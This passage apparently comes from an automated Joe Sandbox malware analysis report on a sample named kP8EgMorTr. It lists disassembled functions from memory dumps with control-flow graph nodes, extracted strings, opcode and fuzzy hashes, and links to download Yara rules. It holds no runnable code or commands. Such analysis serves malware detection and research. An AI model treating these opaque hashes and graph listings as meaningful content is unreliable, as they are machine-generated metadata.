31cc49f-31cc57c call 31c41a0 call 31c3cc0 1832->1835 1836 31cc49a 1832->1836 1833->1815 1834->1821 1839 31cc3fc-31cc400 1834->1839 1848 31cc57e 1835->1848 1849 31cc583-31cc5a4 call 31c5658 1835->1849 1836->1835 1839->1826 1848->1849 1851 31cc5a9-31cc5b4 1849->1851 1852 31cc5bb-31cc5bf 1851->1852 1853 31cc5b6 1851->1853 1854 31cc5c4-31cc5cb 1852->1854 1855 31cc5c1-31cc5c2 1852->1855 1853->1852 1857 31cc5cd 1854->1857 1858 31cc5d2-31cc5e0 1854->1858 1856 31cc5e3-31cc627 1855->1856 1862 31cc68d-31cc6a4 1856->1862 1857->1858 1858->1856 1864 31cc629-31cc63f 1862->1864 1865 31cc6a6-31cc6cb 1862->1865 1869 31cc669 1864->1869 1870 31cc641-31cc64d 1864->1870 1871 31cc6cd-31cc6e2 1865->1871 1872 31cc6e3 1865->1872 1875 31cc66f-31cc68c 1869->1875 1873 31cc64f-31cc655 1870->1873 1874 31cc657-31cc65d 1870->1874 1871->1872 1876 31cc667 1873->1876 1874->1876 1875->1862 1876->1875
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq
                                                                                            • API String ID: 0-1274609152
                                                                                            • Opcode ID: ccbef8fde0bc3134b3df78d8c7de135be23f690cc905b4a5cc87d8510c7348ea
                                                                                            • Instruction ID: 36db47ab3e6aef37e252c1bc41dbbb2d7b2ef7f25b36bb07c93af56e892eb6f3
                                                                                            • Opcode Fuzzy Hash: ccbef8fde0bc3134b3df78d8c7de135be23f690cc905b4a5cc87d8510c7348ea
                                                                                            • Instruction Fuzzy Hash: E2A1E675E10258CFDB14DFAAD984A9DBBF2BF99310F14806AE409AB361DB309D42CF51
                                                                                            Function 031C5362 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1880 31c5362-31c5364 1881 31c53c4-31c5484 call 31c41a0 call 31c3cc0 1880->1881 1882 31c5366-31c536a 1880->1882 1896 31c548b-31c54a9 1881->1896 1897 31c5486 1881->1897 1883 31c536c-31c5370 1882->1883 1884 31c5371-31c53a0 1882->1884 1883->1884 1886 31c53a7-31c53c2 1884->1886 1887 31c53a2 1884->1887 1886->1881 1887->1886 1927 31c54ac call 31c5658 1896->1927 1928 31c54ac call 31c5649 1896->1928 1897->1896 1898 31c54b2-31c54bd 1899 31c54bf 1898->1899 1900 31c54c4-31c54c8 1898->1900 1899->1900 1901 31c54cd-31c54d4 1900->1901 1902 31c54ca-31c54cb 1900->1902 1904 31c54db-31c54e9 1901->1904 1905 31c54d6 1901->1905 1903 31c54ec-31c5530 1902->1903 1909 31c5596-31c55ad 1903->1909 1904->1903 1905->1904 1911 31c55af-31c55d4 1909->1911 1912 31c5532-31c5548 1909->1912 1918 31c55ec 1911->1918 1919 31c55d6-31c55eb 1911->1919 1916 31c554a-31c5556 1912->1916 1917 31c5572 1912->1917 1920 31c5558-31c555e 1916->1920 1921 31c5560-31c5566 1916->1921 1922 31c5578-31c5595 1917->1922 1919->1918 1923 31c5570 1920->1923 1921->1923 1922->1909 1923->1922 1927->1898 1928->1898
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq
                                                                                            • API String ID: 0-1274609152
                                                                                            • Opcode ID: 08df8d53e9cd06710c111cdda66db3e0c1cf6a6aaa638d11c266544fbcbcd849
                                                                                            • Instruction ID: 9dd387821921c200e14252e385d66267a4e9d5ec873e0374ffd310034d736aad
                                                                                            • Opcode Fuzzy Hash: 08df8d53e9cd06710c111cdda66db3e0c1cf6a6aaa638d11c266544fbcbcd849
                                                                                            • Instruction Fuzzy Hash: 9091D674E10258CFDB14CFAAD984A9DBBF2BF99310F14C06AD809AB365DB34A845CF51
                                                                                            Function 031CCA08 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1929 31cca08-31cca38 1930 31cca3f-31cca9e call 31c41a0 1929->1930 1931 31cca3a 1929->1931 1935 31ccaa3-31ccb1c call 31c3cc0 1930->1935 1931->1930 1941 31ccb1e 1935->1941 1942 31ccb23-31ccb54 call 31c5658 1935->1942 1941->1942 1945 31ccb5b-31ccb5f 1942->1945 1946 31ccb56 1942->1946 1947 31ccb64-31ccb6b 1945->1947 1948 31ccb61-31ccb62 1945->1948 1946->1945 1950 31ccb6d 1947->1950 1951 31ccb72-31ccb80 1947->1951 1949 31ccb83-31ccbc7 1948->1949 1955 31ccc2d-31ccc44 1949->1955 1950->1951 1951->1949 1957 31ccbc9-31ccbdf 1955->1957 1958 31ccc46-31ccc5f 1955->1958 1962 31ccc09 1957->1962 1963 31ccbe1-31ccbed 1957->1963 1961 31ccc69-31ccc6b 1958->1961 1964 31ccc6d-31ccc82 1961->1964 1965 31ccc83-31ccce0 1961->1965 1968 31ccc0f-31ccc2c 1962->1968 1966 31ccbef-31ccbf5 1963->1966 1967 31ccbf7-31ccbfd 1963->1967 1964->1965 1975 31ccc68 1965->1975 1976 31ccce2-31ccd70 1965->1976 1969 31ccc07 1966->1969 1967->1969 1968->1955 1969->1968 1975->1961 1975->1966
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq
                                                                                            • API String ID: 0-1274609152
                                                                                            • Opcode ID: d2f7dea20e13a87a8975c2cfcf22f5d12acddfb6ee29a7b3b816e2eb7b2ebe4e
                                                                                            • Instruction ID: c7f5ae627966114b7f843b5a37bd53c0073be0faaa98307741ca4363558103cd
                                                                                            • Opcode Fuzzy Hash: d2f7dea20e13a87a8975c2cfcf22f5d12acddfb6ee29a7b3b816e2eb7b2ebe4e
                                                                                            • Instruction Fuzzy Hash: 7381B374E10258CFDB14DFAAD984A9DBBF2BF99310F148069E419AB365DB309D42CF50
                                                                                            Function 031CCFF8 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1981 31ccff8-31cd028 1983 31cd02f-31cd10c call 31c41a0 call 31c3cc0 1981->1983 1984 31cd02a 1981->1984 1994 31cd10e 1983->1994 1995 31cd113-31cd134 call 31c5658 1983->1995 1984->1983 1994->1995 1997 31cd139-31cd144 1995->1997 1998 31cd14b-31cd14f 1997->1998 1999 31cd146 1997->1999 2000 31cd154-31cd15b 1998->2000 2001 31cd151-31cd152 1998->2001 1999->1998 2003 31cd15d 2000->2003 2004 31cd162-31cd170 2000->2004 2002 31cd173-31cd1b7 2001->2002 2008 31cd21d-31cd234 2002->2008 2003->2004 2004->2002 2010 31cd1b9-31cd1cf 2008->2010 2011 31cd236-31cd25b 2008->2011 2015 31cd1f9 2010->2015 2016 31cd1d1-31cd1dd 2010->2016 2017 31cd25d-31cd272 2011->2017 2018 31cd273 2011->2018 2021 31cd1ff-31cd21c 2015->2021 2019 31cd1df-31cd1e5 2016->2019 2020 31cd1e7-31cd1ed 2016->2020 2017->2018 2022 31cd1f7 2019->2022 2020->2022 2021->2008 2022->2021
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq
                                                                                            • API String ID: 0-1274609152
                                                                                            • Opcode ID: 6cf6dc18ba74556417c3dbaf5d3d9d9a63b93582129ad274042158889be010e8
                                                                                            • Instruction ID: 8d4ea55f2d1246716222ac1f5c733cae6548421f1fcf3a2650a050405881dee5
                                                                                            • Opcode Fuzzy Hash: 6cf6dc18ba74556417c3dbaf5d3d9d9a63b93582129ad274042158889be010e8
                                                                                            • Instruction Fuzzy Hash: 5081B374E00258CFEB14DFAAD984A9DBBF2BF98310F14C069E419AB365DB749981CF50
                                                                                            Function 031CD2CB Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2070 31cd2cb-31cd2f8 2071 31cd2ff-31cd3dc call 31c41a0 call 31c3cc0 2070->2071 2072 31cd2fa 2070->2072 2082 31cd3de 2071->2082 2083 31cd3e3-31cd404 call 31c5658 2071->2083 2072->2071 2082->2083 2085 31cd409-31cd414 2083->2085 2086 31cd41b-31cd41f 2085->2086 2087 31cd416 2085->2087 2088 31cd424-31cd42b 2086->2088 2089 31cd421-31cd422 2086->2089 2087->2086 2091 31cd42d 2088->2091 2092 31cd432-31cd440 2088->2092 2090 31cd443-31cd487 2089->2090 2096 31cd4ed-31cd504 2090->2096 2091->2092 2092->2090 2098 31cd489-31cd49f 2096->2098 2099 31cd506-31cd52b 2096->2099 2103 31cd4c9 2098->2103 2104 31cd4a1-31cd4ad 2098->2104 2105 31cd52d-31cd542 2099->2105 2106 31cd543 2099->2106 2109 31cd4cf-31cd4ec 2103->2109 2107 31cd4af-31cd4b5 2104->2107 2108 31cd4b7-31cd4bd 2104->2108 2105->2106 2110 31cd4c7 2107->2110 2108->2110 2109->2096 2110->2109
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq
                                                                                            • API String ID: 0-1274609152
                                                                                            • Opcode ID: 52e9004bf655fd24cb2a3341926b69dd4f3ea0249aea5ffd8bd3fb212799c317
                                                                                            • Instruction ID: e84f208325233bfc4144ca16ae150a8893cd47a932b3aab9c1aae3d759cdddf8
                                                                                            • Opcode Fuzzy Hash: 52e9004bf655fd24cb2a3341926b69dd4f3ea0249aea5ffd8bd3fb212799c317
                                                                                            • Instruction Fuzzy Hash: AE81B274E00258CFEB14DFAAD984A9DFBF2BF99310F148069E419AB365DB349981CF50
                                                                                            Function 031CC738 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2026 31cc738-31cc768 2027 31cc76f-31cc84c call 31c41a0 call 31c3cc0 2026->2027 2028 31cc76a 2026->2028 2038 31cc84e 2027->2038 2039 31cc853-31cc874 call 31c5658 2027->2039 2028->2027 2038->2039 2041 31cc879-31cc884 2039->2041 2042 31cc88b-31cc88f 2041->2042 2043 31cc886 2041->2043 2044 31cc894-31cc89b 2042->2044 2045 31cc891-31cc892 2042->2045 2043->2042 2047 31cc89d 2044->2047 2048 31cc8a2-31cc8b0 2044->2048 2046 31cc8b3-31cc8f7 2045->2046 2052 31cc95d-31cc974 2046->2052 2047->2048 2048->2046 2054 31cc8f9-31cc90f 2052->2054 2055 31cc976-31cc99b 2052->2055 2059 31cc939 2054->2059 2060 31cc911-31cc91d 2054->2060 2064 31cc99d-31cc9b2 2055->2064 2065 31cc9b3 2055->2065 2063 31cc93f-31cc95c 2059->2063 2061 31cc91f-31cc925 2060->2061 2062 31cc927-31cc92d 2060->2062 2066 31cc937 2061->2066 2062->2066 2063->2052 2064->2065 2066->2063
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq
                                                                                            • API String ID: 0-1274609152
                                                                                            • Opcode ID: 6b0a761f8910c0538a1f1d28c4fa5b10d6dc7763488beb9651b238813aae9ee7
                                                                                            • Instruction ID: d3300b05932f28ef5bfd4a47deb2ce4a758e431b135594cb3e30ae86f541366d
                                                                                            • Opcode Fuzzy Hash: 6b0a761f8910c0538a1f1d28c4fa5b10d6dc7763488beb9651b238813aae9ee7
                                                                                            • Instruction Fuzzy Hash: 4F819274E10258CFEB14DFAAD984A9DFBF2BF98310F14806AD419AB365DB349942CF50
                                                                                            Function 031CD599 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2114 31cd599-31cd5c8 2115 31cd5cf-31cd6ac call 31c41a0 call 31c3cc0 2114->2115 2116 31cd5ca 2114->2116 2126 31cd6ae 2115->2126 2127 31cd6b3-31cd6d4 call 31c5658 2115->2127 2116->2115 2126->2127 2129 31cd6d9-31cd6e4 2127->2129 2130 31cd6eb-31cd6ef 2129->2130 2131 31cd6e6 2129->2131 2132 31cd6f4-31cd6fb 2130->2132 2133 31cd6f1-31cd6f2 2130->2133 2131->2130 2135 31cd6fd 2132->2135 2136 31cd702-31cd710 2132->2136 2134 31cd713-31cd757 2133->2134 2140 31cd7bd-31cd7d4 2134->2140 2135->2136 2136->2134 2142 31cd759-31cd76f 2140->2142 2143 31cd7d6-31cd7fb 2140->2143 2147 31cd799 2142->2147 2148 31cd771-31cd77d 2142->2148 2149 31cd7fd-31cd812 2143->2149 2150 31cd813 2143->2150 2153 31cd79f-31cd7bc 2147->2153 2151 31cd77f-31cd785 2148->2151 2152 31cd787-31cd78d 2148->2152 2149->2150 2154 31cd797 2151->2154 2152->2154 2153->2140 2154->2153
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq
                                                                                            • API String ID: 0-1274609152
                                                                                            • Opcode ID: a690460c4dc4865f0c2239af89af32960899b11cfd0e0872a0526f40c87c9d1c
                                                                                            • Instruction ID: e07c524455f78634aa8e73a0d6afd1b2a531fedeb18eda23b7518bad9a774296
                                                                                            • Opcode Fuzzy Hash: a690460c4dc4865f0c2239af89af32960899b11cfd0e0872a0526f40c87c9d1c
                                                                                            • Instruction Fuzzy Hash: 8981B274E00258CFEB14DFAAD984A9DBBF2BF98310F14C069E819AB365DB349941CF50
                                                                                            Function 05E997B0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2241 5e997b0-5e997df 2242 5e997e1 2241->2242 2243 5e997e6-5e9987c 2241->2243 2242->2243 2245 5e9991b-5e99921 2243->2245 2246 5e99881-5e99894 2245->2246 2247 5e99927-5e9993f 2245->2247 2248 5e9989b-5e998ec 2246->2248 2249 5e99896 2246->2249 2250 5e99941-5e9994e 2247->2250 2251 5e99953-5e99966 2247->2251 2267 5e998ff-5e99911 2248->2267 2268 5e998ee-5e998fc 2248->2268 2249->2248 2252 5e99ce9-5e99de6 2250->2252 2253 5e99968 2251->2253 2254 5e9996d-5e99989 2251->2254 2259 5e99de8-5e99ded 2252->2259 2260 5e99dee-5e99df8 2252->2260 2253->2254 2257 5e9998b 2254->2257 2258 5e99990-5e999b4 2254->2258 2257->2258 2263 5e999bb-5e999ed 2258->2263 2264 5e999b6 2258->2264 2259->2260 2273 5e999ef 2263->2273 2274 5e999f4-5e99a36 2263->2274 2264->2263 2270 5e99918 2267->2270 2271 5e99913 2267->2271 2268->2247 2270->2245 2271->2270 2273->2274 2276 5e99a38 2274->2276 2277 5e99a3d-5e99a46 2274->2277 2276->2277 2278 5e99c6e-5e99c74 2277->2278 2279 5e99a4b-5e99a70 2278->2279 2280 5e99c7a-5e99c8d 2278->2280 2281 5e99a72 2279->2281 2282 5e99a77-5e99aae 2279->2282 2283 5e99c8f 2280->2283 2284 5e99c94-5e99caf 2280->2284 2281->2282 2292 5e99ab0 2282->2292 2293 5e99ab5-5e99ae7 2282->2293 2283->2284 2285 5e99cb1 2284->2285 2286 5e99cb6-5e99cca 2284->2286 2285->2286 2290 5e99ccc 2286->2290 2291 5e99cd1-5e99ce7 LdrInitializeThunk 2286->2291 2290->2291 2291->2252 2292->2293 2295 5e99ae9-5e99b0e 2293->2295 2296 5e99b4b-5e99b5e 2293->2296 2297 5e99b10 2295->2297 2298 5e99b15-5e99b43 2295->2298 2299 5e99b60 2296->2299 2300 5e99b65-5e99b8a 2296->2300 2297->2298 2298->2296 2299->2300 2303 5e99b99-5e99bd1 2300->2303 2304 5e99b8c-5e99b8d 2300->2304 2305 5e99bd8-5e99c39 call 5e99590 2303->2305 2306 5e99bd3 2303->2306 2304->2280 2312 5e99c3b 2305->2312 2313 5e99c40-5e99c64 2305->2313 2306->2305 2312->2313 2316 5e99c6b 2313->2316 2317 5e99c66 2313->2317 2316->2278 2317->2316
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3703933664.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_5e90000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c2cec22b30bb8d690d5fab945dbeb245a67754d8fbbfdf459c292063a122eb0
                                                                                            • Instruction ID: 2ddd6384cb8a5f00264356bdb6e2e443333983961cd0c0da8a05e821526cf33a
                                                                                            • Opcode Fuzzy Hash: 5c2cec22b30bb8d690d5fab945dbeb245a67754d8fbbfdf459c292063a122eb0
                                                                                            • Instruction Fuzzy Hash: 66F1E674E00219CFDB28DFA9C984B9DFBB2BF48304F5481A9D848AB355DB749985CF50
                                                                                            Function 031C69A0 Relevance: 1.8, Strings: 1, Instructions: 505COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oq
                                                                                            • API String ID: 0-1999159160
                                                                                            • Opcode ID: e85303169ed3ecd724c972c9a3856a947e545ca1496be2da74e3fa2593ff28d6
                                                                                            • Instruction ID: 1e10d10f859186eacb19cc98474349d99d9b8753e0630091e1a6222736d4b119
                                                                                            • Opcode Fuzzy Hash: e85303169ed3ecd724c972c9a3856a947e545ca1496be2da74e3fa2593ff28d6
                                                                                            • Instruction Fuzzy Hash: 95127B70A102598FDB14DF69D854BAEBBB6BF98300F18856EE409AB394DF34DD41CB90
                                                                                            Function 031C3E09 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $q
                                                                                            • API String ID: 0-1301096350
                                                                                            • Opcode ID: eb6eb47d46d901dfc317dd24753f716e3e609ca20fcf7b379eae7702ebf9aa42
                                                                                            • Instruction ID: 59102bb5b2b946f2be9208bff9b3edea0e31c06426a16d0174ea88fe5fbac2bd
                                                                                            • Opcode Fuzzy Hash: eb6eb47d46d901dfc317dd24753f716e3e609ca20fcf7b379eae7702ebf9aa42
                                                                                            • Instruction Fuzzy Hash: 9791B434B18358CBDB5CEBB9946427E7BB3BFC8710B05852DE506E7388CE3588128796
                                                                                            Function 031C29EC Relevance: .4, Instructions: 436COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0dbbe399bf7ea018253aba7d5f4e9a8a2372626ce3f9a2ee252bbb87c2de268e
                                                                                            • Instruction ID: 3b563c43ecd418566c24c0f7f314bda05075349aa7c724b110b8ac9ec7711801
                                                                                            • Opcode Fuzzy Hash: 0dbbe399bf7ea018253aba7d5f4e9a8a2372626ce3f9a2ee252bbb87c2de268e
                                                                                            • Instruction Fuzzy Hash: A7C11936D242998BCFA5CF7888403EDFB71EB5D600F188D99C454AF251DB368A4BCB91
                                                                                            Function 031CEC18 Relevance: .1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 66c3519ddc1afd67b9d3018d46838b104f859da6be9269737d615eabf711bc1e
                                                                                            • Instruction ID: 6aa3540255d28e7211a8562c96510ad6cbd09a70357fe65db41d4f63d379e374
                                                                                            • Opcode Fuzzy Hash: 66c3519ddc1afd67b9d3018d46838b104f859da6be9269737d615eabf711bc1e
                                                                                            • Instruction Fuzzy Hash: 5F518574E00348DFDB18DFAAD994AADBBB2FF89300F249129E815AB364DB345941CF14
                                                                                            Function 031CEC0B Relevance: .1, Instructions: 146COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b749cabfe250859a76b7e588faa15cbbb4d0329812524b94711625e0b88c941
                                                                                            • Instruction ID: be5d6fc24d5d61c09d4f0d40ea6f2f27d19dab63ab4abf180ef9988d5b80da6c
                                                                                            • Opcode Fuzzy Hash: 2b749cabfe250859a76b7e588faa15cbbb4d0329812524b94711625e0b88c941
                                                                                            • Instruction Fuzzy Hash: AC51A774E10348DFDB18DFA9D954AADBBB2FF89300F24912AE815AB365DB345842CF10
                                                                                            Function 031C76F1 Relevance: 8.0, Strings: 6, Instructions: 469COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 31c76f1-31c7725 1 31c772b-31c774e 0->1 2 31c7b54-31c7b58 0->2 11 31c77fc-31c7800 1->11 12 31c7754-31c7761 1->12 3 31c7b5a-31c7b6e 2->3 4 31c7b71-31c7b7f 2->4 9 31c7bf0-31c7c05 4->9 10 31c7b81-31c7b96 4->10 17 31c7c0c-31c7c19 9->17 18 31c7c07-31c7c0a 9->18 19 31c7b9d-31c7baa 10->19 20 31c7b98-31c7b9b 10->20 15 31c7848-31c7851 11->15 16 31c7802-31c7810 11->16 24 31c7770 12->24 25 31c7763-31c776e 12->25 21 31c7c67 15->21 22 31c7857-31c7861 15->22 16->15 36 31c7812-31c782d 16->36 26 31c7c1b-31c7c56 17->26 18->26 27 31c7bac-31c7bed 19->27 20->27 30 31c7c6c-31c7c9c 21->30 22->2 28 31c7867-31c7870 22->28 31 31c7772-31c7774 24->31 25->31 74 31c7c5d-31c7c64 26->74 34 31c787f-31c788b 28->34 35 31c7872-31c7877 28->35 53 31c7c9e-31c7cb4 30->53 54 31c7cb5-31c7cbc 30->54 31->11 38 31c777a-31c77dc 31->38 34->30 41 31c7891-31c7897 34->41 35->34 60 31c782f-31c7839 36->60 61 31c783b 36->61 86 31c77de 38->86 87 31c77e2-31c77f9 38->87 43 31c789d-31c78ad 41->43 44 31c7b3e-31c7b42 41->44 58 31c78af-31c78bf 43->58 59 31c78c1-31c78c3 43->59 44->21 47 31c7b48-31c7b4e 44->47 47->2 47->28 62 31c78c6-31c78cc 58->62 59->62 63 31c783d-31c783f 60->63 61->63 62->44 66 31c78d2-31c78e1 62->66 63->15 67 31c7841 63->67 72 31c798f-31c79ba call 31c7538 * 2 66->72 73 31c78e7 66->73 67->15 90 31c7aa4-31c7abe 72->90 91 31c79c0-31c79c4 72->91 76 31c78ea-31c78fb 73->76 76->30 79 31c7901-31c7913 76->79 79->30 81 31c7919-31c7931 79->81 144 31c7933 call 31c80d8 81->144 145 31c7933 call 31c7fa4 81->145 146 31c7933 call 31c7fe4 81->146 147 31c7933 call 31c8055 81->147 85 31c7939-31c7949 85->44 89 31c794f-31c7952 85->89 86->87 87->11 92 31c795c-31c795f 89->92 93 31c7954-31c795a 89->93 90->2 113 31c7ac4-31c7ac8 90->113 91->44 95 31c79ca-31c79ce 91->95 92->21 96 31c7965-31c7968 92->96 93->92 93->96 98 31c79f6-31c79fc 95->98 99 31c79d0-31c79dd 95->99 100 31c796a-31c796e 96->100 101 31c7970-31c7973 96->101 103 31c79fe-31c7a02 98->103 104 31c7a37-31c7a3d 98->104 116 31c79ec 99->116 117 31c79df-31c79ea 99->117 100->101 102 31c7979-31c797d 100->102 101->21 101->102 102->21 105 31c7983-31c7989 102->105 103->104 106 31c7a04-31c7a0d 103->106 107 31c7a3f-31c7a43 104->107 108 31c7a49-31c7a4f 104->108 105->72 105->76 111 31c7a1c-31c7a32 106->111 112 31c7a0f-31c7a14 106->112 107->74 107->108 114 31c7a5b-31c7a5d 108->114 115 31c7a51-31c7a55 108->115 111->44 112->111 121 31c7aca-31c7ad4 call 31c63e0 113->121 122 31c7b04-31c7b08 113->122 118 31c7a5f-31c7a68 114->118 119 31c7a92-31c7a94 114->119 115->44 115->114 120 31c79ee-31c79f0 116->120 117->120 125 31c7a6a-31c7a6f 118->125 126 31c7a77-31c7a8d 118->126 119->44 127 31c7a9a-31c7aa1 119->127 120->44 120->98 121->122 132 31c7ad6-31c7aeb 121->132 122->74 129 31c7b0e-31c7b12 122->129 125->126 126->44 129->74 131 31c7b18-31c7b25 129->131 135 31c7b34 131->135 136 31c7b27-31c7b32 131->136 132->122 141 31c7aed-31c7b02 132->141 138 31c7b36-31c7b38 135->138 136->138 138->44 138->74 141->2 141->122 144->85 145->85 146->85 147->85
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oq$(oq$(oq$(oq$(oq$(oq
                                                                                            • API String ID: 0-4267992933
                                                                                            • Opcode ID: e7e79612c5c892954494c2f681b5045b7694e9c269a0764f3c1d453ded06f05b
                                                                                            • Instruction ID: d99b6e57b119bce729dbcddfc18596e8846c3d4678bbe20bb3850092424a16fd
                                                                                            • Opcode Fuzzy Hash: e7e79612c5c892954494c2f681b5045b7694e9c269a0764f3c1d453ded06f05b
                                                                                            • Instruction Fuzzy Hash: 23125C34A102898FCB24CF69D984A9EBBF6FF58310F188599E8559B3A1DB70ED41CF50
                                                                                            Function 031C8490 Relevance: 3.2, Strings: 2, Instructions: 697COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
